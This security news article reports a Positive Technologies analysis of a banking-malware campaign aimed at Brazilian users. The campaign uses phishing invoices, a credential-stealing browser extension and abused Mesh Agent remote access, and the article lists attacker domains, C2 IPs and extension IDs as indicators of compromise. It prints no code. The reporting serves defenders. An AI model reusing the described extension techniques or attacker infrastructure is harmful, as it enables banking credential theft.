EnigmaCyberSecurity: Brazil-Focused Banking Malware Campaign Uses RATs and Malicious Extensions
Ddos 
Attack chain using a browser extension | Image: Positive Technologies
Positive Technologies has uncovered an ongoing, multi-stage cybercrime campaign—dubbed “EnigmaCyberSecurity”—primarily targeting Brazilian users and financial institutions. The operation leverages phishing emails, malicious browser extensions, and remote access trojans (RATs) to harvest sensitive banking data and infiltrate corporate systems. According to the researchers, attacks have been active since the beginning of 2025 and have already impacted victims in Brazil, Mexico, Colombia, Czech Republic, Russia, Vietnam, and beyond.
The campaign begins with phishing emails disguised as invoices, often sent from servers of compromised companies—a tactic that dramatically increases success rates. One of the first-stage payloads is a BAT script that escalates privileges, installs PowerShell modules, and retrieves a remote script designed to evade detection.
“The attackers used a malicious extension for Google Chrome, Microsoft Edge, and Brave browsers,” Positive Technologies noted, “as well as Mesh Agent and PDQ Connect Agent.”
The main of the browser attack chain is a malicious extension posing as a legitimate update, delivered via Chrome’s extension store and Inno Setup/MSI installers. Once installed, it monitors interactions with Banco do Brasil’s online platform. Deobfuscated code revealed that:
- Login and password fields were exfiltrated to financial-executive.com
- A unique victim identifier (eindeutigeKennung) is generated for targeted tracking
- Fake QR codes and loading events simulate bank interactions to trick users
- The extension leverages Chrome’s API hooks like onBeforeRequest and onMessage to extract login tokens and passwords.
“The attackers collect confidential user information used for authentication in a specific service (presumably Banco do Brasil),” researchers concluded.
The second attack vector involves Mesh Agent, a legitimate remote access tool abused for stealthy persistence and infrastructure infiltration. Delivered via phishing MSI files, it connects to the attackers’ custom server at mesh.computadorpj.com.
Unlike the browser extension—which targets individuals—Mesh Agent enables lateral movement across enterprise networks, posing a serious threat to businesses.
“The RAT attack enables attackers to spread across the infected infrastructure, whereas the malicious extension attack targets only a single user device.”
Investigators identified a vast infrastructure including:
- Malicious domains: computadorpj.com, clientepj.com, ranchocentral.com
- C2 IPs: 142.54.185.178, 107.174.231.26
- Removed extensions: nplfchpahihleeejpjmodggckakhglee, ckkjdiimhlanonhceggkfjlmjnenpmfm
Despite removal from Chrome Web Store, the extensions were downloaded over 700 times, with attackers relying on compromised corporate websites to spread malicious links. One such page still live asks visitors to “Enter the victim’s email address below“—an indicator of mass-targeted phishing via compromised infrastructure.
“The attackers’ goal is to steal authentication data from the victims’ bank accounts,” Positive Technologies concluded.
Organizations and users alike must remain vigilant, especially in regions with active campaigns. Recommendations include:
- Block indicators of compromise (IoCs)
- Audit browser extensions
- Detect Mesh Agent anomalies
- Educate users on invoice-based phishing
Donate